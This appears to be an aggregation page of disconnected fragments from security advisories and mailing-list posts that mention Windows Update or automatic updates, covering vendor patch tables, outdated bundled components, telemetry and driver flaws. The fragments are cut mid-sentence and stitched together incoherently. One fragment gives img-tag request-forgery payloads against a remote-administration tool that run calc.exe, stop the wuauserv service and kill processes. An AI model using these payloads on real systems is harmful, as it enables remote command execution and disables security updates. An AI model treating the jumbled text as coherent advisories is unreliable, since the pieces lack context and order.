automatic updates
Windows Update (as well as Microsoft Update and the Automatic Update)
installs an outdated (and from its manufacturer unsupported) Flash
Player ActiveX control on Windows XP.
Although this fact is nothing really new, it but shows the lack of taking
care for security problems and in general the chutzpah of many software
"producers" to ship their "products" with outdated and often vulnerable
components.
>Flash Player 10.0 r22
>
>--Monday, April 20, 2009, 8:17:24 PM, you wrote to bugtraq@securityfocus.com:
>
>SK> Windows Update (as well as Microsoft Update and the Automatic Update)
>SK> installs an outdated (and from its manufacturer unsupported) Flash
>SK> Player ActiveX control on Windows XP.
>
>
>SK> Although this fact is nothing really new, it but shows the lack of taking
>SK> care for security problems and in general the chutzpah of many software
* The result of malicious software removal
* The operating system version
* The operating system locale
* The processor architecture
* The version number of the tool
* An indicator that notes whether the tool is being run by Microsoft Update, Windows Update, Automatic Updates, the Download Center, or from the Web site
* An anonymous GUID
* A cryptographic one-way hash (MD5) of the path and file name of each malicious software file that is removed from the computer
If apparently malicious software is found on the computer, the tool prompts you to send information to Microsoft beyond what is listed here. You are prompted in each of these instances, and this information is sent only with your consent. The additional information includes the following:
* The files that are suspected to be malicious software. The tool will identify the files for you.
* A cryptographic one-way hash (MD5) of any suspicious files that are detected.
You can disable the reporting feature. For information about how to disable the reporting component and how to prevent this tool from sending information to Microsoft, click the following article number to view the article in the Microsoft Knowledge Base:
- Internet Security 2009 (Hotfix)
- Panda Antivirus Pro 2009 (Hotfix)
- Panda Security for Business with Exchange
- Panda Security for Business
- Panda Security for Enterprise
- Panda GateDefender Integra (patched through automatic updates)
- Panda GateDefender Performa (patched through automatic updates)
- Panda AdminSecure (patched through automatic updates)
SaaS
- Panda Managed Office Protection
available.
VMware         Product Running Replace with/
Product        Version on      Apply Patch
============== ======= ======= =================
Update Manager 1.0     Windows Update Manager fix for Jetty *
Update Manager 4.0     Windows Update Manager fix for Jetty *
Update Manager 4.1     Windows Update Manager fix for Jetty *
* Refer to VMware Knowledge Base article 1023962
. Older versions may be affected, but were not checked.
*Non-vulnerable Packages*
. BitDefender Antivirus 2008 builds available through automatic updates,
posterior to January 18th.
. Comodo Firewall Pro 3.0
. Rising Antivirus 20.38.20
If "Web View Content" is enabled in Windows Explorer, which is the
default setting, a single click will open the malicious file in the
preview pane and trigger the vulnerability.
DirectX 9.0c is listed as an optional update for Windows 2000 operating
system in Windows Update site. It is not listed as a critical update.
However, installing this update will remove this vulnerability.
IV. DETECTION
iDefense has confirmed Microsoft DirectX 7.x and Microsoft DirectX 8.x
as well as
<http://www.microsoft.com/downloads/details.aspx?FamilyID=a5c84275-3b97-4ab7-a40d-3802b2af5fc2>
for the previous updates.
Fortunately the eventually installed outdated VC++ runtime will be
updated by the "Automatic Updates" feature of Windows with the hotfix
MS09-035 alias KB973551, IFF the Windows administrator has opt'd-in
to "Microsoft Update".
If not, all users of OpenOffice.org (as well as other poorly crafted
software which distributes outdated 3rd-party DLLs) are put at risk!
This paper explains an attack vector inherent to certain WDM audio
drivers running on Windows Vista, XP, 2000 and 2003. Successful
exploitation could lead to local escalation of privileges.
The paper also covers the interesting case of es1371mp.sys, a vulnerable
WDM driver that can be automatically installed through Windows Update,
on systems with Ensoniq PCI 1371 based SoundCards (Certain VMware
products emulate a soundcard of this type).
It can be downloaded at :
(v 1.01)
/index.aas?job=command&action=calc.exe
Example 3 - Stopping Services:
<img src="http://[AAS IP or DYNDNS
HOST]:6262/index.aas?job=setservice&action=stop&select=[servicename]">
This for example would disable Automatic Updates:
/index.aas?job=setservice&action=stop&select=wuauserv
Example 4 - Killing Processes:
<img src="http://[AAS IP or DYNDNS
HOST]:6262/index.aas?job=killprocess&select=[exename]">
(column 4) if a solution is available.
VMware   Product  Running Replace with/
Product  Version  on      Apply Patch
======== ======== ======= =======================
Virtual- 2.5      Windows Update 3 build 119838
Center
Virtual- 2.0.2    Windows not affected
Center
hosted * any      any     not affected
(column 4) if a solution is available.
VMware        Product  Running Replace with/
Product       Version  on      Apply Patch
============= ======== ======= =================
vCenter       4.0      Windows Update 1
VirtualCenter 2.5      Windows affected, patch pending
VirtualCenter 2.0.2    Windows affected, patch pending
Workstation   any      any     not affected
SOLUTION
Stop using ICQ or switch to another IM client until a fix is released
since ICQ 7 does not offer to disable automatic updates.
TIMELINE
2010-11-12
everyone is happy.
The concept of Microsoft's Malicious Software Removal tool not being a backdoor is
flawed. For starters, no information is ever disclosed to someone installing the Windows
Malicious Software removal tool: "Windows will now install a program which will report
suspicious activity to Microsoft". As far as I can recall on any Windows update, there has
never been any mention of it.
"But this is a wonderful tool, why are you being such a troll and knocking Microsoft for
doing the right thing!". The question slash qualm I have about this tool is I'd like to know
what, why, when and how things are being done on my machine. It's not a matter of
Trustix Secure Linux is a small Linux distribution for servers. With focus
on security and stability, the system is painlessly kept safe and up to
date from day one using swup, the automated software updater.
Automatic updates:
Users of the SWUP tool can enjoy having updates automatically
installed using 'swup --upgrade'.
Questions?
- F-Secure Anti-Virus for MIMEsweeper 5.61 and earlier
Patch availability :
~~~~~~~~~~~~~~~~~~~~
Patches distributed through automatic updates
I. Background
~~~~~~~~~~~~~
Quote: "F-Secure offers a broad range of PC and internet security
products made for your home or business, so you will
(column 4) if a solution is available.
VMware        Product  Running Replace with/
Product       Version  on      Apply Patch
============= ======== ======= =================
vCenter       4.0      Windows Update 1
VirtualCenter 2.5      Windows not affected
VirtualCenter 2.0.2    Windows not affected
Workstation   any      any     not affected
>
>
> SOLUTION
>
> Stop using ICQ or switch to another IM client until a fix is released
> since ICQ 7 does not offer to disable automatic updates.
>
>
> TIMELINE
>
> 2010-11-12
Avast! Multiple Vulnerabilities
BACKGROUND
Avast! antivirus software represents complete virus protection, offering full desktop security including a resident shield. Daily automatic updates ensure continuous data protection against all types of malware and spyware. Avast! antivirus is certified by both ICSA Labs and West Coast Labs Checkmark.
Avast! Professional Edition 4.8 is a collection of award winning, high-end technologies that work in perfect synergy, having one common goal: to protect your system and valuable data against computer viruses, spyware and rootkits. It represents a best-in-class antivirus solution for any Windows-based workstation.
Source: http://www.avast.com
VULNERABLE PRODUCTS
Original Vendor Advisories:
http://www.adobe.com/support/security/bulletins/apsb08-13.html
http://www.adobe.com/support/security/advisories/apsa08-01.html
== Solutions ==
Adobe recommends Acrobat 8 users on Windows update to Acrobat 8.1.2
available here:
http://www.adobe.com/support/downloads/detail.jsp?ftpID=3849.
== Credit ==
Discovered and advised to Adobe February , 2007 by Paul Craig of
- McAfee Active Virus Defense
- McAfee Active VirusScan
Patch availability :
~~~~~~~~~~~~~~~~~~~~
Patches distributed through automatic updates
I. Background
~~~~~~~~~~~~~
Quote: "McAfee proactively secures systems and networks from known
and as yet undiscovered threats worldwide. Home users, businesses,
- Norton AntiVirus
- Norton Systemworks
Patch availability :
~~~~~~~~~~~~~~~~~~~~
Patches distributed through automatic updates
I. Background
~~~~~~~~~~~~~
Quote: "Symantec helps consumers and organizations secure and
manage their information-driven world. Our software and services
from http://heartbeat.skype.com/2007/08/what_happened_on_august_16.html:
The disruption was triggered by a massive restart of our users'
computers across the globe within a very short timeframe as they
re-booted after receiving a routine set of patches through Windows
Update.
The high number of restarts affected Skype's network resources.
This caused a flood of log-in requests, which, combined with the
lack of peer-to-peer network resources, prompted a chain reaction
that had a critical impact.
VMware        Product  Running Replace with/
Product       Version  on      Apply Patch
============= ======== ======= =================
vCenter       4.0      Windows affected, patch pending *
VirtualCenter 2.5      Windows Update 6
VirtualCenter 2.0.2    Windows affected, patch pending
Workstation   any      any     not affected
Player        any      any     not affected
* Test Plan module (testplan.tds)
The customization feature of Quality Center is often used for:
* Controlling password compliance (no blank password, more than 8 letters, etc.)
* Chained lists (when a value is selected in a field, another field gets updated with a list relevant to that value)
* Automatic updates to some QC components (Test, Test Set, Defect objects, hidden fields)
* Hiding information depending on the user's group (used when a project is shared with different vendors)
* Others
The workflow is often driven by using the OTA (Open Test Architecture), the Quality Center API. This API allows the manipulation of any QC object (e.g. Subject folder, Test/Defect objects, Fields, etc.). It also allows the direct manipulation of the database used by Quality Center.